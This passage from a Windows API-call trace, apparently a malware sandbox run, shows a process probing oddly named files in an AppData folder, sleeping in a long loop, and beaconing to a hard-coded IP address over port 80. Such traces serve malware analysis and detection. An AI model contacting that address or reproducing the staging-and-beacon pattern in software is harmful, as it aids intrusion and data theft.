BaseAddress=0x892abf0) returned 1 [0222.356] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.356] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.356] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.356] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.356] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.356] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.356] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0222.356] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.356] Sleep (dwMilliseconds=0x7d0) [0222.358] Sleep (dwMilliseconds=0x7d0) [0222.359] Sleep (dwMilliseconds=0x7d0) [0222.361] Sleep (dwMilliseconds=0x7d0) [0222.362] Sleep (dwMilliseconds=0x7d0) [0222.387] Sleep (dwMilliseconds=0x7d0) [0222.388] Sleep (dwMilliseconds=0x7d0) [0222.394] Sleep (dwMilliseconds=0x7d0) [0222.396] Sleep (dwMilliseconds=0x7d0) [0222.398] Sleep (dwMilliseconds=0x7d0) [0222.449] Sleep (dwMilliseconds=0x7d0) [0222.453] Sleep (dwMilliseconds=0x7d0) [0222.454] Sleep (dwMilliseconds=0x7d0) [0222.456] Sleep (dwMilliseconds=0x7d0) [0222.458] Sleep (dwMilliseconds=0x7d0) [0222.459] Sleep (dwMilliseconds=0x7d0) [0222.461] Sleep (dwMilliseconds=0x7d0) [0222.462] Sleep (dwMilliseconds=0x7d0) [0222.464] Sleep (dwMilliseconds=0x7d0) [0222.466] Sleep (dwMilliseconds=0x7d0) [0222.468] Sleep (dwMilliseconds=0x7d0) [0222.470] Sleep (dwMilliseconds=0x7d0) [0222.472] Sleep (dwMilliseconds=0x7d0) [0222.473] Sleep (dwMilliseconds=0x7d0) [0222.475] Sleep (dwMilliseconds=0x7d0) [0222.476] Sleep (dwMilliseconds=0x7d0) [0222.478] Sleep (dwMilliseconds=0x7d0) [0222.480] Sleep (dwMilliseconds=0x7d0) [0222.481] Sleep (dwMilliseconds=0x7d0) [0222.483] Sleep (dwMilliseconds=0x7d0) [0222.484] Sleep (dwMilliseconds=0x7d0) [0222.486] Sleep (dwMilliseconds=0x7d0) [0222.487] Sleep (dwMilliseconds=0x7d0) [0222.489] Sleep (dwMilliseconds=0x7d0) [0222.490] Sleep (dwMilliseconds=0x7d0) [0222.492] Sleep (dwMilliseconds=0x7d0) [0222.493] Sleep (dwMilliseconds=0x7d0) [0222.495] Sleep (dwMilliseconds=0x7d0) [0222.496] Sleep (dwMilliseconds=0x7d0) [0222.498] Sleep (dwMilliseconds=0x7d0) [0222.511] Sleep (dwMilliseconds=0x7d0) [0222.513] Sleep (dwMilliseconds=0x7d0) [0222.514] Sleep (dwMilliseconds=0x7d0) [0222.516] Sleep (dwMilliseconds=0x7d0) [0222.517] Sleep (dwMilliseconds=0x7d0) [0222.519] Sleep (dwMilliseconds=0x7d0) [0222.520] Sleep (dwMilliseconds=0x7d0) [0222.522] Sleep (dwMilliseconds=0x7d0) [0222.523] Sleep (dwMilliseconds=0x7d0) [0222.525] Sleep (dwMilliseconds=0x7d0) [0222.526] Sleep (dwMilliseconds=0x7d0) [0222.528] Sleep (dwMilliseconds=0x7d0) [0222.529] Sleep (dwMilliseconds=0x7d0) [0222.531] Sleep (dwMilliseconds=0x7d0) [0222.532] Sleep (dwMilliseconds=0x7d0) [0222.534] Sleep (dwMilliseconds=0x7d0) [0222.539] Sleep (dwMilliseconds=0x7d0) [0222.541] Sleep (dwMilliseconds=0x7d0) [0222.542] Sleep (dwMilliseconds=0x7d0) [0222.544] Sleep (dwMilliseconds=0x7d0) [0222.546] Sleep (dwMilliseconds=0x7d0) [0222.548] Sleep (dwMilliseconds=0x7d0) [0222.550] Sleep (dwMilliseconds=0x7d0) [0222.551] Sleep (dwMilliseconds=0x7d0) [0222.553] Sleep (dwMilliseconds=0x7d0) [0222.555] Sleep (dwMilliseconds=0x7d0) [0222.556] Sleep (dwMilliseconds=0x7d0) [0222.558] Sleep (dwMilliseconds=0x7d0) [0222.559] Sleep (dwMilliseconds=0x7d0) [0222.561] Sleep (dwMilliseconds=0x7d0) [0222.563] Sleep (dwMilliseconds=0x7d0) [0222.569] Sleep (dwMilliseconds=0x7d0) [0222.572] Sleep (dwMilliseconds=0x7d0) [0222.573] Sleep (dwMilliseconds=0x7d0) [0222.575] Sleep (dwMilliseconds=0x7d0) [0222.576] Sleep (dwMilliseconds=0x7d0) [0222.578] Sleep (dwMilliseconds=0x7d0) [0222.579] Sleep (dwMilliseconds=0x7d0) [0222.581] Sleep (dwMilliseconds=0x7d0) [0222.582] Sleep (dwMilliseconds=0x7d0) [0222.584] Sleep (dwMilliseconds=0x7d0) [0222.585] Sleep (dwMilliseconds=0x7d0) [0222.587] Sleep (dwMilliseconds=0x7d0) [0222.588] Sleep (dwMilliseconds=0x7d0) [0222.590] Sleep (dwMilliseconds=0x7d0) [0222.591] Sleep (dwMilliseconds=0x7d0) [0222.593] Sleep (dwMilliseconds=0x7d0) [0222.594] Sleep (dwMilliseconds=0x7d0) [0222.596] Sleep (dwMilliseconds=0x7d0) [0222.597] Sleep (dwMilliseconds=0x7d0) [0222.599] Sleep (dwMilliseconds=0x7d0) [0222.600] Sleep (dwMilliseconds=0x7d0) [0222.602] Sleep (dwMilliseconds=0x7d0) [0222.603] Sleep (dwMilliseconds=0x7d0) [0222.605] Sleep (dwMilliseconds=0x7d0) [0222.606] Sleep (dwMilliseconds=0x7d0) [0222.608] Sleep (dwMilliseconds=0x7d0) [0222.609] Sleep (dwMilliseconds=0x7d0) [0222.611] Sleep (dwMilliseconds=0x7d0) [0222.612] Sleep (dwMilliseconds=0x7d0) [0222.614] Sleep (dwMilliseconds=0x7d0) [0222.615] Sleep (dwMilliseconds=0x7d0) [0222.617] Sleep (dwMilliseconds=0x7d0) [0222.618] Sleep (dwMilliseconds=0x7d0) [0222.620] Sleep (dwMilliseconds=0x7d0) [0222.621] Sleep (dwMilliseconds=0x7d0) [0222.623] Sleep (dwMilliseconds=0x7d0) [0222.624] Sleep (dwMilliseconds=0x7d0) [0222.626] Sleep (dwMilliseconds=0x7d0) [0222.627] Sleep (dwMilliseconds=0x7d0) [0222.629] Sleep (dwMilliseconds=0x7d0) [0222.630] Sleep (dwMilliseconds=0x7d0) [0222.632] Sleep (dwMilliseconds=0x7d0) [0222.633] Sleep (dwMilliseconds=0x7d0) [0222.635] Sleep (dwMilliseconds=0x7d0) [0222.637] Sleep (dwMilliseconds=0x7d0) [0222.639] Sleep (dwMilliseconds=0x7d0) [0222.640] Sleep (dwMilliseconds=0x7d0) [0222.642] Sleep (dwMilliseconds=0x7d0) [0222.643] Sleep (dwMilliseconds=0x7d0) [0222.645] Sleep (dwMilliseconds=0x7d0) [0222.646] Sleep (dwMilliseconds=0x7d0) [0222.648] Sleep (dwMilliseconds=0x7d0) [0222.649] Sleep (dwMilliseconds=0x7d0) [0222.651] Sleep (dwMilliseconds=0x7d0) [0222.652] Sleep (dwMilliseconds=0x7d0) [0222.654] Sleep (dwMilliseconds=0x7d0) [0222.655] Sleep (dwMilliseconds=0x7d0) [0222.657] Sleep (dwMilliseconds=0x7d0) [0222.658] Sleep (dwMilliseconds=0x7d0) [0222.660] Sleep (dwMilliseconds=0x7d0) [0222.661] Sleep (dwMilliseconds=0x7d0) [0222.663] Sleep (dwMilliseconds=0x7d0) [0222.664] Sleep (dwMilliseconds=0x7d0) [0222.666] Sleep (dwMilliseconds=0x7d0) [0222.667] Sleep (dwMilliseconds=0x7d0) [0222.669] Sleep (dwMilliseconds=0x7d0) [0222.670] Sleep (dwMilliseconds=0x7d0) [0222.672] Sleep (dwMilliseconds=0x7d0) [0222.673] Sleep (dwMilliseconds=0x7d0) [0222.675] Sleep (dwMilliseconds=0x7d0) [0222.676] Sleep (dwMilliseconds=0x7d0) [0222.678] Sleep (dwMilliseconds=0x7d0) [0222.679] Sleep (dwMilliseconds=0x7d0) [0222.681] Sleep (dwMilliseconds=0x7d0) [0222.682] Sleep (dwMilliseconds=0x7d0) [0222.684] Sleep (dwMilliseconds=0x7d0) [0222.685] Sleep (dwMilliseconds=0x7d0) [0222.687] Sleep (dwMilliseconds=0x7d0) [0222.688] Sleep (dwMilliseconds=0x7d0) [0222.690] Sleep (dwMilliseconds=0x7d0) [0222.691] Sleep (dwMilliseconds=0x7d0) [0222.693] Sleep (dwMilliseconds=0x7d0) [0222.694] Sleep (dwMilliseconds=0x7d0) [0222.696] Sleep (dwMilliseconds=0x7d0) [0222.697] Sleep (dwMilliseconds=0x7d0) [0222.699] Sleep (dwMilliseconds=0x7d0) [0222.700] Sleep (dwMilliseconds=0x7d0) [0222.702] Sleep (dwMilliseconds=0x7d0) [0222.703] Sleep (dwMilliseconds=0x7d0) [0222.705] Sleep (dwMilliseconds=0x7d0) [0222.706] Sleep (dwMilliseconds=0x7d0) [0222.708] Sleep (dwMilliseconds=0x7d0) [0222.709] Sleep (dwMilliseconds=0x7d0) [0222.711] Sleep (dwMilliseconds=0x7d0) [0222.712] Sleep (dwMilliseconds=0x7d0) [0222.714] Sleep (dwMilliseconds=0x7d0) [0222.715] Sleep (dwMilliseconds=0x7d0) [0222.717] Sleep (dwMilliseconds=0x7d0) [0222.718] Sleep (dwMilliseconds=0x7d0) [0222.720] Sleep (dwMilliseconds=0x7d0) [0222.721] Sleep (dwMilliseconds=0x7d0) [0222.723] Sleep (dwMilliseconds=0x7d0) [0222.724] Sleep (dwMilliseconds=0x7d0) [0222.726] Sleep (dwMilliseconds=0x7d0) [0222.727] Sleep (dwMilliseconds=0x7d0) [0222.729] Sleep (dwMilliseconds=0x7d0) [0222.730] Sleep (dwMilliseconds=0x7d0) [0222.732] Sleep (dwMilliseconds=0x7d0) [0222.733] Sleep (dwMilliseconds=0x7d0) [0222.735] Sleep (dwMilliseconds=0x7d0) [0222.737] Sleep (dwMilliseconds=0x7d0) [0222.739] Sleep (dwMilliseconds=0x7d0) [0222.740] Sleep (dwMilliseconds=0x7d0) [0222.742] Sleep (dwMilliseconds=0x7d0) [0222.743] Sleep (dwMilliseconds=0x7d0) [0222.745] Sleep (dwMilliseconds=0x7d0) [0222.746] Sleep (dwMilliseconds=0x7d0) [0222.748] Sleep (dwMilliseconds=0x7d0) [0222.749] Sleep (dwMilliseconds=0x7d0) [0222.751] Sleep (dwMilliseconds=0x7d0) [0222.752] Sleep (dwMilliseconds=0x7d0) [0222.754] Sleep (dwMilliseconds=0x7d0) [0222.755] Sleep (dwMilliseconds=0x7d0) [0222.757] Sleep (dwMilliseconds=0x7d0) [0222.758] Sleep (dwMilliseconds=0x7d0) [0222.760] Sleep (dwMilliseconds=0x7d0) [0222.761] Sleep (dwMilliseconds=0x7d0) [0222.763] Sleep (dwMilliseconds=0x7d0) [0222.764] Sleep (dwMilliseconds=0x7d0) [0222.766] Sleep (dwMilliseconds=0x7d0) [0222.767] Sleep (dwMilliseconds=0x7d0) [0222.769] Sleep (dwMilliseconds=0x7d0) [0222.770] Sleep (dwMilliseconds=0x7d0) [0222.772] Sleep (dwMilliseconds=0x7d0) [0222.773] Sleep (dwMilliseconds=0x7d0) [0222.775] Sleep (dwMilliseconds=0x7d0) [0222.776] Sleep (dwMilliseconds=0x7d0) [0222.778] Sleep (dwMilliseconds=0x7d0) [0222.779] Sleep (dwMilliseconds=0x7d0) [0222.781] Sleep (dwMilliseconds=0x7d0) [0222.782] Sleep (dwMilliseconds=0x7d0) [0222.785] Sleep (dwMilliseconds=0x7d0) [0222.786] Sleep (dwMilliseconds=0x7d0) [0222.788] Sleep (dwMilliseconds=0x7d0) [0222.789] Sleep (dwMilliseconds=0x7d0) [0222.791] Sleep (dwMilliseconds=0x7d0) [0222.796] Sleep (dwMilliseconds=0x7d0) [0222.797] Sleep (dwMilliseconds=0x7d0) [0222.799] Sleep (dwMilliseconds=0x7d0) [0222.800] Sleep (dwMilliseconds=0x7d0) [0222.802] Sleep (dwMilliseconds=0x7d0) [0222.803] Sleep (dwMilliseconds=0x7d0) [0222.805] Sleep (dwMilliseconds=0x7d0) [0222.806] Sleep (dwMilliseconds=0x7d0) [0222.808] Sleep (dwMilliseconds=0x7d0) [0222.809] Sleep (dwMilliseconds=0x7d0) [0222.811] Sleep (dwMilliseconds=0x7d0) [0222.812] Sleep (dwMilliseconds=0x7d0) [0222.814] Sleep (dwMilliseconds=0x7d0) [0222.815] Sleep (dwMilliseconds=0x7d0) [0222.817] Sleep (dwMilliseconds=0x7d0) [0222.818] Sleep (dwMilliseconds=0x7d0) [0222.820] Sleep (dwMilliseconds=0x7d0) [0222.821] Sleep (dwMilliseconds=0x7d0) [0222.823] Sleep (dwMilliseconds=0x7d0) [0222.824] Sleep (dwMilliseconds=0x7d0) [0222.826] Sleep (dwMilliseconds=0x7d0) [0222.827] Sleep (dwMilliseconds=0x7d0) [0222.829] Sleep (dwMilliseconds=0x7d0) [0222.830] Sleep (dwMilliseconds=0x7d0) [0222.832] Sleep (dwMilliseconds=0x7d0) [0222.833] Sleep (dwMilliseconds=0x7d0) [0222.835] Sleep (dwMilliseconds=0x7d0) [0222.837] Sleep (dwMilliseconds=0x7d0) [0222.839] Sleep (dwMilliseconds=0x7d0) [0222.840] Sleep (dwMilliseconds=0x7d0) [0222.842] Sleep (dwMilliseconds=0x7d0) [0222.843] Sleep (dwMilliseconds=0x7d0) [0222.845] Sleep (dwMilliseconds=0x7d0) [0222.846] Sleep (dwMilliseconds=0x7d0) [0222.848] Sleep (dwMilliseconds=0x7d0) [0222.849] Sleep (dwMilliseconds=0x7d0) [0222.851] Sleep (dwMilliseconds=0x7d0) [0222.852] Sleep (dwMilliseconds=0x7d0) [0222.854] Sleep (dwMilliseconds=0x7d0) [0222.855] Sleep (dwMilliseconds=0x7d0) [0222.857] Sleep (dwMilliseconds=0x7d0) [0222.858] Sleep (dwMilliseconds=0x7d0) [0222.860] Sleep (dwMilliseconds=0x7d0) [0222.861] Sleep (dwMilliseconds=0x7d0) [0222.863] Sleep (dwMilliseconds=0x7d0) [0222.864] Sleep (dwMilliseconds=0x7d0) [0222.866] Sleep (dwMilliseconds=0x7d0) [0222.867] Sleep (dwMilliseconds=0x7d0) [0222.869] Sleep (dwMilliseconds=0x7d0) [0222.870] Sleep (dwMilliseconds=0x7d0) [0222.872] Sleep (dwMilliseconds=0x7d0) [0222.873] Sleep (dwMilliseconds=0x7d0) [0222.875] Sleep (dwMilliseconds=0x7d0) [0222.876] Sleep (dwMilliseconds=0x7d0) [0222.878] Sleep (dwMilliseconds=0x7d0) [0222.879] Sleep (dwMilliseconds=0x7d0) [0222.881] Sleep (dwMilliseconds=0x7d0) [0222.882] Sleep (dwMilliseconds=0x7d0) [0222.884] Sleep (dwMilliseconds=0x7d0) [0222.885] Sleep (dwMilliseconds=0x7d0) [0222.887] Sleep (dwMilliseconds=0x7d0) [0222.888] Sleep (dwMilliseconds=0x7d0) [0222.890] Sleep (dwMilliseconds=0x7d0) [0222.899] Sleep (dwMilliseconds=0x7d0) [0222.900] Sleep (dwMilliseconds=0x7d0) [0222.901] Sleep (dwMilliseconds=0x7d0) [0222.903] Sleep (dwMilliseconds=0x7d0) [0222.904] Sleep (dwMilliseconds=0x7d0) [0222.906] Sleep (dwMilliseconds=0x7d0) [0222.907] Sleep (dwMilliseconds=0x7d0) [0222.909] Sleep (dwMilliseconds=0x7d0) [0222.911] Sleep (dwMilliseconds=0x7d0) [0222.912] Sleep (dwMilliseconds=0x7d0) [0222.913] Sleep (dwMilliseconds=0x7d0) [0222.915] Sleep (dwMilliseconds=0x7d0) [0222.916] Sleep (dwMilliseconds=0x7d0) [0222.918] Sleep (dwMilliseconds=0x7d0) [0222.919] Sleep (dwMilliseconds=0x7d0) [0222.921] Sleep (dwMilliseconds=0x7d0) [0222.922] Sleep (dwMilliseconds=0x7d0) [0222.924] Sleep (dwMilliseconds=0x7d0) [0222.925] Sleep (dwMilliseconds=0x7d0) [0222.927] Sleep (dwMilliseconds=0x7d0) [0222.929] Sleep (dwMilliseconds=0x7d0) [0222.930] Sleep (dwMilliseconds=0x7d0) [0222.932] Sleep (dwMilliseconds=0x7d0) [0222.933] Sleep (dwMilliseconds=0x7d0) [0222.935] Sleep (dwMilliseconds=0x7d0) [0222.937] Sleep (dwMilliseconds=0x7d0) [0222.939] Sleep (dwMilliseconds=0x7d0) [0222.940] Sleep (dwMilliseconds=0x7d0) [0222.942] Sleep (dwMilliseconds=0x7d0) [0222.978] Sleep (dwMilliseconds=0x7d0) [0222.980] Sleep (dwMilliseconds=0x7d0) [0222.981] Sleep (dwMilliseconds=0x7d0) [0222.983] Sleep (dwMilliseconds=0x7d0) [0222.986] Sleep (dwMilliseconds=0x7d0) [0222.989] Sleep (dwMilliseconds=0x7d0) [0222.991] Sleep (dwMilliseconds=0x7d0) [0222.993] Sleep (dwMilliseconds=0x7d0) [0222.995] Sleep (dwMilliseconds=0x7d0) [0222.997] Sleep (dwMilliseconds=0x7d0) [0222.999] Sleep (dwMilliseconds=0x7d0) [0223.001] Sleep (dwMilliseconds=0x7d0) [0223.003] Sleep (dwMilliseconds=0x7d0) [0223.006] Sleep (dwMilliseconds=0x7d0) [0223.008] Sleep (dwMilliseconds=0x7d0) [0223.010] Sleep (dwMilliseconds=0x7d0) [0223.012] Sleep (dwMilliseconds=0x7d0) [0223.014] Sleep (dwMilliseconds=0x7d0) [0223.016] Sleep (dwMilliseconds=0x7d0) [0223.018] Sleep (dwMilliseconds=0x7d0) [0223.020] Sleep (dwMilliseconds=0x7d0) [0223.022] Sleep (dwMilliseconds=0x7d0) [0223.024] Sleep (dwMilliseconds=0x7d0) [0223.026] Sleep (dwMilliseconds=0x7d0) [0223.028] Sleep (dwMilliseconds=0x7d0) [0223.030] Sleep (dwMilliseconds=0x7d0) [0223.032] Sleep (dwMilliseconds=0x7d0) [0223.034] Sleep (dwMilliseconds=0x7d0) [0223.035] Sleep (dwMilliseconds=0x7d0) [0223.038] Sleep (dwMilliseconds=0x7d0) [0223.039] Sleep (dwMilliseconds=0x7d0) [0223.041] Sleep (dwMilliseconds=0x7d0) [0223.042] Sleep (dwMilliseconds=0x7d0) [0223.044] Sleep (dwMilliseconds=0x7d0) [0223.045] Sleep (dwMilliseconds=0x7d0) [0223.047] Sleep (dwMilliseconds=0x7d0) [0223.048] Sleep (dwMilliseconds=0x7d0) [0223.050] Sleep (dwMilliseconds=0x7d0) [0223.051] Sleep (dwMilliseconds=0x7d0) [0223.053] Sleep (dwMilliseconds=0x7d0) [0223.054] Sleep (dwMilliseconds=0x7d0) [0223.055] Sleep (dwMilliseconds=0x7d0) [0223.057] Sleep (dwMilliseconds=0x7d0) [0223.058] Sleep (dwMilliseconds=0x7d0) [0223.060] Sleep (dwMilliseconds=0x7d0) [0223.062] Sleep (dwMilliseconds=0x7d0) [0223.063] Sleep (dwMilliseconds=0x7d0) [0223.064] Sleep (dwMilliseconds=0x7d0) [0223.066] Sleep (dwMilliseconds=0x7d0) [0223.067] Sleep (dwMilliseconds=0x7d0) [0223.069] Sleep (dwMilliseconds=0x7d0) [0223.070] Sleep (dwMilliseconds=0x7d0) [0223.072] Sleep (dwMilliseconds=0x7d0) [0223.074] Sleep (dwMilliseconds=0x7d0) [0223.075] Sleep (dwMilliseconds=0x7d0) [0223.076] Sleep (dwMilliseconds=0x7d0) [0223.078] Sleep (dwMilliseconds=0x7d0) [0223.079] Sleep (dwMilliseconds=0x7d0) [0223.081] Sleep (dwMilliseconds=0x7d0) [0223.082] Sleep (dwMilliseconds=0x7d0) [0223.084] Sleep (dwMilliseconds=0x7d0) [0223.085] Sleep (dwMilliseconds=0x7d0) [0223.087] Sleep (dwMilliseconds=0x7d0) [0223.089] Sleep (dwMilliseconds=0x7d0) [0223.090] Sleep (dwMilliseconds=0x7d0) [0223.092] Sleep (dwMilliseconds=0x7d0) [0223.094] Sleep (dwMilliseconds=0x7d0) [0223.095] socket (af=2, type=1, protocol=6) returned 0x2688 [0223.096] connect (s=0x2688, name=0x8883c60*(sa_family=2, sin_port=0x50, sin_addr="156.245.192.153"), namelen=16) returned 0 [0223.296] send (s=0x2688, buf=0xa10808a*, len=171, flags=0) returned 171 [0223.296] setsockopt (s=0x2688, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0223.297] recv (in: s=0x2688, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 2359 [0223.522] closesocket (s=0x2688) returned 0 [0223.523] Sleep (dwMilliseconds=0x7d0) [0223.525] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.525] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.525] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0223.525] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.525] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.525] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.525] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.525] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.525] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.525] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.525] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.525] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.525] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.525] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.525] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0223.525] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0223.525] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, 